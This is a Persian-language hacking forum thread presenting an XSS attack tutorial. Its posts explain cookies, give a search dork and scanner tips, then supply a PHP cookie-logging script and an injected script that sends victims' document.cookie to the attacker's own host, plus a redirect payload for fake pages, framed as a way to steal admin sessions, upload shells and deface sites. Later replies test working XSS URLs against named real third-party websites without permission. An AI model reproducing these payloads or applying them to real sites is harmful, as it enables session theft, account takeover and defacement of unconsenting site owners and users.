رتبه موضوع:
  • 1 رای - 5 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
اموزش XSS و کدهای ان
#1
درود
یک بار اقا امیر و یک بار پروین خانم درخواست اموزش XSS رو داشتن که من کم کم اموزش XSS رو تقدیم اعضای پارسی کدرز میکنم.

XSS چیست ؟


XSS یا همون CSS که مخفف کلمه Cross Site Scripting می باشد CSS هم مخفف کلمه Cascading Style Sheat هست.
معمولا در این نوح حملات کوکی سیستم طرف رو میزنیم هدایتش میکنیم به یه صفحه دیگه

حالا این کوکی چیست ؟


كوكي عبارت است از يك پيغام كه سرور به مرورگر ( Browser ) شما مي فرستد. مرورگر شما اين پيغام را در يك فايل متني ( Text ) ذخيره مي كند. پس از آن هر بار كه كه شما به آن سرور مراجعه مي كنيد ( يعني يك صفحه از وب سايتي را كه روي آن سرور قرار دارد باز مي كنيد. ) يا به عبارت ديگر هر بار كه مرورگر شما (مثلاً اينترنت اكسپلورر ) در خواست يك صفحه از آن سرور مي كند اين پيغام را به آن سرور باز مي گرداند.

هدف اصلي كوكي ها شناسايي كاربران است تا تنظيماتي را كه كاربر بنا بر سليقه خود دفعة قبل روي يك وب سايت مثلاً ياهو انجام داده اكنون هم بتواند صفحه را با همان تنظيمات دفعه قبل برايش باز كند. براي مثال فرض كنيد در Hotmail يك ايميل درست كرده ايد و اكنون بعد از چند روز دوباره وارد سايت Hotmail مي شويد تا با وارد كردن ID (يا شناسه ) و پسورد وارد ايميل خود شويد و مشاهده مي كنيد كه با باز شدن صفحه ID شما از قبل نوشته شده است يا حتي اگر از قبل اين امكان را ايجاد كرده باشيد پسورد شما هم وارد شده فقط كافيست اينتر را بزنيد و وارد ايميل خود شويد. و زمانيكه در گوگل زبان خود را انتخاب مي كنيد و دفعه بعد كه وارد گوگل مي شويد و زبان مورد نظر شما به طور اتوماتيك انتخاب شده است همه اين كارها و بسياري از كارهاي ديگر اينچنيني بوسيله كوكي ها انجام مي شود در حقيقت از طريق كوكي ها سرور وب صفحات را مطابق عادت و سليقه شما باز مي كند و به اين طريق در وقت و حوصله شما صرفه جويي مي شود




انواع کوکی ها:



کوکی هاي پایا – دائمی (presistent Cookies) :

این نوع کوکی ها به عنوان یک فایل بر روي کامپیوتر شما ذخیره می شوند و بعد از بستن

مرورگر اینترنتی شما پاك نخواهند شد و همچنان باقی می مانند. این کوکی ها قابلیت به روز شدن توسط سایت ایجاد کننده خود را دارند همچنین سایت اجازه دسترسی مستقیم به این کوکی ها رو نیز دارد حدود 80 درصد کوکی هاي مورد استفاده از این نوع هستند .



کوکی هاي موقت (Temporary Cookies) :

کوکی هایی هستند که بعد از بستن مرورگر اینترنتی شما و یا خروج از سایت استفاده کننده از کوکی پاك می شوند .

نوع دیگر کوکی هاي موقت کوکی هاي زمان دار هستند که زمانی براي کار دارند و بعد از آن اصطلاحا Expire می شوند و از کار می افتند ولی پاك نمی شوند و در صورت بازدید مجدد از سایت ممکن است به روز رسانی شوند و مجددا مورد استفاده قرار بگیرند .



کوکی هاي ناخوشایند (Unsatisfactory cookies) :

این کوکی ها اجازه دسترسی به اطلاعات خصوصی شما را براي استفاده دویاره بدون پرسیدن از شما دارند از این کوکی ها بیشتر در خرید

مورد استفاده قرار می گیرند. (SSL*) هاي اینترنتی و سایت امن

ادامه دارد ...
در صورتی که سوال دارید و سوالتون مختصر هست با شماره 09120642214 میتونید تماس بگیرید.
کسانی که دوست دارن در کانال فروشگاه ما و یا کانال انجمن عضو بشن یک پیامک در تلگرام برای من بفرستید که عضوشون میکنم.

ادرس فروشگاه :

http://www.amshop.ir



ای ام شاپ را در اینستگرام دنبال کنید

ای ام شاپ رو در کانال تلگرام دنبال کنید



This forum uses Lukasz Tkacz MyBB addons.
پاسخ
#2
خوب توضیحاتی دادیم در مورد این باگ بدم من به روش اسان همیشه مطالبم رو اموزش میدهم .
خوب باید باید بگیریم اول بفهمیم سایت باگ xss داره یا نداره !
یادتون باشه یاید مدیر سایت انلاین باشه مثلا توی نظرات یک وب سایت باگ xss داره وقتی کدمون رو تزریق میکنیم باید مدیر سایت صفحه رو باز کنه وقتی که باز کنه اون موقع کد ما اجرا میشه و میتونیم دستورات رو اجرا کنیم .
یادتون باشه وقتی مرورگر مدیر سایت صفحه ای که کدهای xss رو تزریق کردیم رو باز میکنه کدهای ما اجرا شده توجه کنید کدهاتون روی سیستم مدیر سایت یا کاربرقربانی اجرا میشه و ربطی به سرور نداره
وقتی کوکی رو بزنیم میتونیم یوزر و گذرواژه طرف رو بزنیم و حتی شل اپلود کنیم و کلا دیفیس کنیم.
برای پیدا کردن سایت های که باگ xss دارن نیاز به درک یا اسکنر یا به صورت دستی تست کردن داریم .
من فعلا یک درک میزارم بعد درک های بیشتری قرار میدهیم.
درک xss
کد:
"search?q=" or "search.php?q=
راه بعدی استفاده از اسکنر Acunetix Web Vulnerability Scanner سایت رو بدید اسکن کنه در صورت پیدا کردن پیغام Cross Site Scripting رو دیدید بدونید که باگ xss داره و نقطه ضعف داره !

حالا یه تست xss میکنیم سایت زیر رو باز کنید .
http://www.lifepages.org/comm/search1.asp

در قسمت سرچ برای کشف اسیب پذیری xss در قسمت سرچ عبارت زیر رو تایپ کنید :

کد:
<script>alert("xss bug find by parsicoders")</script>
اگر در قسمت سرچ باگ xss باشه پیغام xss bug find b parsicoders رو میبینید.
روی تصویر زیر کلیک کنید تا بهتر متوجه بشید :




توجه کنید باید xss در کامنت یا جایی باشه که مدی سایت ببینه بعد از پیدا کردن تارگت میخواهیم کوکیش رو بزنیم چطوری کوکی رو بزنیم ؟

اول برید توی سایت x10hosting.com یه هاست فری برای خودتون درست کنید.

کد زیر رو داخل notepad وارد کنید و به اسم iran.php ذخیره کنید.

کد :

کد:
<?php
$cookie = $_GET['cookie'];
$log = fopen("parsicoders.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>


بعد از ذخیره داخل هاست که اکانت ساختید اپلود کنید یا در هاست رایگان gigfa.com هم میشه
تازه وارد ها (فایل باید داخل پوشه Public_Html ) باشه

حالا کد زیر رو تزریق میکنیم

کد:
<script>document.location="http://www.siteshoma.com/iran.php?cookie=" + document.cookie;</script>

حالا جای siteshoma.com ادرس سایت خودتون رو بدید اگر به فرض در قسمت نظرات همچین باگی باشه هر کاربری کلیک کرد نظرات رو ببینه از ادمین تا کاربرها همه کوکیهاشون در هاستتون کنار فایلی که اپلود کردید یه فایل به اسم parsicoders.log ایجاد میشه

اگر بخواهیم مدیر سایت یا کاربرانش رو به سایت دیگری هدایت کنیم به روش زیر عمل میکنیم (بدرد fake page ) هم میخوره
به کد زیر توجه کنید :

Redirect to http://www.parsicoders.com
کد:
<script>window.location="http://parsicoders.com/index.php";</script>
.... ادامه دارد
در صورتی که سوال دارید و سوالتون مختصر هست با شماره 09120642214 میتونید تماس بگیرید.
کسانی که دوست دارن در کانال فروشگاه ما و یا کانال انجمن عضو بشن یک پیامک در تلگرام برای من بفرستید که عضوشون میکنم.

ادرس فروشگاه :

http://www.amshop.ir



ای ام شاپ را در اینستگرام دنبال کنید

ای ام شاپ رو در کانال تلگرام دنبال کنید



This forum uses Lukasz Tkacz MyBB addons.
پاسخ
#3
ببخشيد وسط درس يه سئوال بپرسم؟بعدا جابجاش كنيد.
من اكونتيكس رو دانلود كردم و باهاش چند تا سايت رو اسكن كردم. يكيش باگ xss داره. تو بخش جستجوي سايت اين كد شما رو نوشتم ولي اين اررور رو نداد. چرا؟
پاسخ
#4
سایتو همینجا بزار تا بگم (لینک مربوط به باگ xss)
در صورتی که سوال دارید و سوالتون مختصر هست با شماره 09120642214 میتونید تماس بگیرید.
کسانی که دوست دارن در کانال فروشگاه ما و یا کانال انجمن عضو بشن یک پیامک در تلگرام برای من بفرستید که عضوشون میکنم.

ادرس فروشگاه :

http://www.amshop.ir



ای ام شاپ را در اینستگرام دنبال کنید

ای ام شاپ رو در کانال تلگرام دنبال کنید



This forum uses Lukasz Tkacz MyBB addons.
پاسخ
#5
اين سايته
http://jjs.uestc.edu.cn
پاسخ
#6
خوب کدوم قسمتش باگ xss داره ؟
اخه اسکن کنم یه کم طول میکشه
در صورتی که سوال دارید و سوالتون مختصر هست با شماره 09120642214 میتونید تماس بگیرید.
کسانی که دوست دارن در کانال فروشگاه ما و یا کانال انجمن عضو بشن یک پیامک در تلگرام برای من بفرستید که عضوشون میکنم.

ادرس فروشگاه :

http://www.amshop.ir



ای ام شاپ را در اینستگرام دنبال کنید

ای ام شاپ رو در کانال تلگرام دنبال کنید



This forum uses Lukasz Tkacz MyBB addons.
پاسخ
#7
اكونتيكس كه فقط اينو نوشته
This vulnerability affects /player.php.
نميدونم درسته يانه. وقتي روي باگ قرمز كليك ميكنم اين مياد. ولي من تو قسمت سرچ صفحه اصلي سايت كد شما رو دادم.
پاسخ
#8
این سایت که دادی یه عالمه باگ داره
xss هم
کد:
http://jjs.uestc.edu.cn/download.php?name=<script>alert("xss bug find by parsicoders")</script>
البته باگ های بشتر از xss داره
واسه پلیرش هم این میشه
کد:
http://jjs.uestc.edu.cn:80/player.php?vid=<script>alert("xss bug find by parsicoders")</script>
در صورتی که سوال دارید و سوالتون مختصر هست با شماره 09120642214 میتونید تماس بگیرید.
کسانی که دوست دارن در کانال فروشگاه ما و یا کانال انجمن عضو بشن یک پیامک در تلگرام برای من بفرستید که عضوشون میکنم.

ادرس فروشگاه :

http://www.amshop.ir



ای ام شاپ را در اینستگرام دنبال کنید

ای ام شاپ رو در کانال تلگرام دنبال کنید



This forum uses Lukasz Tkacz MyBB addons.
پاسخ
#9
اين ادرس هايي كه دادي رو از كجا اوردي؟ اكونتيكس كه اين ها رو نميده يا ميده و من بلد نيستم؟
الان من اين ادرس ها رو باز ميكنم كه هيچ اتفاقي نميوفته.
چطوري ميشه با اين باگ يه تصوير دلخواه گذاشت بذاريم تو سايت
پاسخ
#10
اینجوری :

مرحله 1:


مرحله 2:


در صورتی که سوال دارید و سوالتون مختصر هست با شماره 09120642214 میتونید تماس بگیرید.
کسانی که دوست دارن در کانال فروشگاه ما و یا کانال انجمن عضو بشن یک پیامک در تلگرام برای من بفرستید که عضوشون میکنم.

ادرس فروشگاه :

http://www.amshop.ir



ای ام شاپ را در اینستگرام دنبال کنید

ای ام شاپ رو در کانال تلگرام دنبال کنید



This forum uses Lukasz Tkacz MyBB addons.
پاسخ


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  اموزش DDOS Amin_Mansouri 14 22,501 01-06-2017، 02:16 PM
آخرین ارسال: taktok
  اموزش هک مودم ADSL Amin_Mansouri 7 10,577 09-06-2016، 12:36 AM
آخرین ارسال: A.S
  کلیپ اموزش حرفه ای sql injection Amin_Mansouri 0 1,944 06-07-2012، 11:58 PM
آخرین ارسال: Amin_Mansouri
  اموزش حمله Sql injection بصورت انلاین Amin_Mansouri 0 3,790 06-05-2012، 11:28 PM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


کاربران در حال بازدید این موضوع: 1 مهمان
<------> <____> <<<<----------------->>>> <<<<--->>>>>
This forum uses Lukasz Tkacz MyBB addons.